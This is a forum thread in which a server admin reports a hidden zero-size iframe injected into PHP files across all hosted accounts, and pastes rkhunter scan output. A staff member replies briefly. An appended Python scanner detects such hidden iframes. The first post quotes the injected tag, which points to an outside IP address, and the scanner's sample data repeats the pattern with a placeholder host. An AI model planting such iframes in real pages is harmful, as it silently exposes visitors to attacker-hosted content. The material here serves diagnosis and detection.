
iframes injections problem and rkhunter warnings

Discussion in 'General Discussion' started by xserverx, Aug 25, 2007.

  1. xserverx

    xserverx Member

    I have a major problem with iframes being injected into every file (header.php, footer.php, index.php, login.php and vars.php) on all server accounts.

    Code:
    <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
    
    What is the reason and how do I fix that?


    My second problem is the rkhunter warnings; I am not sure if they are related to the first problem:
    rkhunter results:
    Code:
    Checking system commands...
    
      Performing 'strings' command checks
        Checking 'strings' command                               [ OK ]
    
      Performing 'shared libraries' checks
        Checking for preloading variables                        [ None found ]
        Checking for preload file                                [ Not found ]
        Checking LD_LIBRARY_PATH variable                        [ Not found ]
    
      Performing file properties checks
        Checking for prerequisites                               [ Warning ]
      .....
        /usr/bin/awk                                             [ OK ]
        /usr/bin/chattr                                          [ OK ]
        /usr/bin/curl                                            [ OK ]
        /usr/bin/cut                                             [ OK ]
        /usr/bin/diff                                            [ OK ]
        /usr/bin/dirname                                         [ OK ]
        /usr/bin/du                                              [ OK ]
        /usr/bin/env                                             [ OK ]
        /usr/bin/file                                            [ OK ]
        /usr/bin/find                                            [ OK ]
        /usr/bin/GET                                             [ Warning ]
        /usr/bin/groups                                          [ Warning ]
        /usr/bin/head                                            [ OK ]
        /usr/bin/id                                              [ OK ]
        /usr/bin/kill                                            [ OK ]
        /usr/bin/killall                                         [ OK ]
        /usr/bin/last                                            [ OK ]
        /usr/bin/lastlog                                         [ OK ]
        /usr/bin/ldd                                             [ Warning ]
        /usr/bin/less                                            [ OK ]
        /usr/bin/locate                                          [ OK ]
        /usr/bin/logger                                          [ OK ]
        /usr/bin/w                                               [ OK ]
        /usr/bin/watch                                           [ OK ]
        /usr/bin/wc                                              [ OK ]
        /usr/bin/wget                                            [ OK ]
        /usr/bin/whatis                                          [ Warning ]
        /usr/bin/whereis                                         [ OK ]
        /usr/bin/which                                           [ OK ]
        /usr/bin/who                                             [ OK ]
        /usr/bin/whoami                                          [ OK ]
        /usr/bin/gawk                                            [ OK ]
        /sbin/chkconfig                                          [ OK ]
        /sbin/depmod                                             [ OK ]
        /sbin/ifconfig                                           [ OK ]
        /sbin/ifdown                                             [ Warning ]
        /sbin/ifup                                               [ Warning ]
        /sbin/init                                               [ OK ]
        /sbin/insmod                                             [ OK ]
        /sbin/ip                                                 [ OK ]
        /sbin/lsmod                                              [ OK ]
        /sbin/modinfo                                            [ OK ]
        /sbin/modprobe                                           [ OK ]
        /sbin/nologin                                            [ OK ]
        /sbin/rmmod                                              [ OK ]
        /sbin/runlevel                                           [ OK ]
        /sbin/sulogin                                            [ OK ]
        /sbin/sysctl                                             [ OK ]
        /sbin/syslogd                                            [ OK ]
        /usr/sbin/adduser                                        [ OK ]
        /usr/sbin/chroot                                         [ OK ]
        /usr/sbin/groupadd                                       [ OK ]
        /usr/sbin/groupdel                                       [ OK ]
        /usr/sbin/groupmod                                       [ OK ]
    
        /usr/sbin/usermod                                        [ OK ]
        /usr/sbin/vipw                                           [ OK ]
        /usr/sbin/xinetd                                         [ OK ]
        /usr/local/bin/perl                                      [ OK ]
        /usr/local/bin/rkhunter                                  [ OK ]
    
    
    
      Performing additional rootkit checks
        Suckit Rookit additional checks                          [ OK ]
        Checking for possible rootkit files and directories      [ None found ]
        Checking for possible rootkit strings                    [ None found ]
    
      Performing malware checks
        Checking running processes for suspicious files          [ None found ]
        Checking for login backdoors                             [ None found ]
        Checking for suspicious directories                      [ None found ]
        Checking for sniffer log files                           [ None found ]
    
      Performing trojan specific checks
        Checking for enabled xinetd services                     [ None found ]
        Checking for Apache backdoor                             [ Not found ]
    
      Performing Linux specific checks
        Checking kernel module commands                          [ OK ]
        Checking kernel module names                             [ OK ]
    Checking the network...
    
      Performing check for backdoor ports
        Checking for UDP port 2001                                [ Not found ]
        Checking for TCP port 2006                                [ Not found ]
        Checking for TCP port 2128                                [ Not found ]
        Checking for TCP port 14856                              [ Not found ]
        Checking for TCP port 47107                              [ Not found ]
        Checking for TCP port 60922                              [ Not found ]
    
      Performing checks on the network interfaces
        Checking for promiscuous interfaces                      [ None found ]
    
    Checking the local host...
    
      Performing system boot checks
        Checking for local host name                             [ Found ]
        Checking for local startup files                         [ Found ]
        Checking local startup files for malware                 [ None found ]
        Checking system startup files for malware                [ None found ]
    
      Performing group and account checks
        Checking for passwd file                                 [ Found ]
        Checking for root equivalent (UID 0) accounts            [ None found ]
        Checking for passwordless accounts                       [ None found ]
        Checking for passwd file changes                         [ None found ]
        Checking for group file changes                          [ None found ]
        Checking root account shell history files                [ OK ]
    
      Performing system configuration file checks
        Checking for SSH configuration file                      [ Found ]
        Checking if SSH root access is allowed                   [ Warning ]
        Checking if SSH protocol v1 is allowed                   [ Warning ]
        Checking for running syslog daemon                       [ Found ]
        Checking for syslog configuration file                   [ Found ]
        Checking if syslog remote logging is allowed             [ Not allowed ]
    
      Performing filesystem checks
        Checking /dev for suspicious file types                  [ None found ]
        Checking for hidden files and directories                [ Warning ]
    Checking application versions...
    
        Checking version of Exim MTA                             [ OK ]
        Checking version of GnuPG                                [ Warning ]
        Checking version of Apache                               [ Skipped ]
        Checking version of Bind DNS                             [ OK ]
        Checking version of OpenSSL                              [ Warning ]
        Checking version of PHP                                  [ OK ]
        Checking version of Procmail MTA                         [ OK ]
        Checking version of OpenSSH                              [ OK ]
    
    
    System checks summary
    =====================
    
    File properties checks...
        Required commands check failed
        Files checked: 129
        Suspect files: 6
    
    Rootkit checks...
        Rootkits checked : 114
        Possible rootkits: 0
    
    Applications checks...
        Applications checked: 8
        Suspect applications: 2
    
    The system checks took: 3 minutes and 12 seconds
    
    All results have been written to the logfile (/var/log/rkhunter.log)
    
    One or more warnings have been found while checking the system.
    Please check the log file (/var/log/rkhunter.log)
    
    How can I fix all these problems, please?
     
  2. xserverx

    xserverx Member

    Can someone help, please?
     
  3. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Sounds like you need to hire an expert to have a look at your server if you're not sure what's going on. You might also search the forums for the word iframes. The first result is this thread; the second is a thread, pages long, called iframe / javascript hacks?
    http://forums.cpanel.net/showthread.php?t=62821&highlight=iframes

    Might be something useful there for you.

    Good luck.
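
A defender-side way to locate every file carrying a tag like the one quoted in the first post, as an added example that is not part of the original thread: it flags iframes with zero width or height, or hidden through CSS, across a directory tree. The function names, the suffix list and the sample strings (with a placeholder `.invalid` host) are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Matches an opening <iframe ...> tag and captures its attribute string.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Attribute parser: name=value with double, single or no quotes.
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# A dimension that renders as nothing: 0, 00, 0px, 0%.
ZERO_RE = re.compile(r"^0+(?:px|%)?$", re.IGNORECASE)

def hidden_iframes(text):
    """Return the src of every iframe in text that has no visible area."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = {}
        for name, dq, sq, bare in ATTR_RE.findall(m.group(1)):
            attrs[name.lower()] = dq or sq or bare
        style = attrs.get("style", "").lower().replace(" ", "")
        zero_size = any(ZERO_RE.match(attrs.get(k, "")) for k in ("width", "height"))
        css_hidden = any(s in style for s in ("display:none", "visibility:hidden"))
        if zero_size or css_hidden:
            hits.append(attrs.get("src", ""))
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js", ".tpl")):
    """Map each file under root that contains a hidden iframe to the src values found."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = hidden_iframes(path.read_text(errors="replace"))
            if found:
                findings[str(path)] = found
    return findings

# Constructed samples: a tag using the attributes from the post (placeholder src)
# and an ordinary visible embed that must not be flagged.
SAMPLE_INJECTED = ("<?php include 'vars.php'; ?>\n"
                   "<iframe src='http://placeholder.invalid/go.php' "
                   "style='border:0px solid gray;' WIDTH=0 HEIGHT=0 "
                   "FRAMEBORDER=0 SCROLLING=no></iframe>")
SAMPLE_CLEAN = '<iframe src="https://example.com/map" width="600" height="400"></iframe>'

if __name__ == "__main__":
    import sys
    # Usage: python scan.py /home  (prints each affected file and the src values)
    for file, srcs in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(file, srcs)
```

Comparing the modification times of the flagged files with the web, FTP and control-panel logs for the same window helps narrow down how the tag was written.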
     
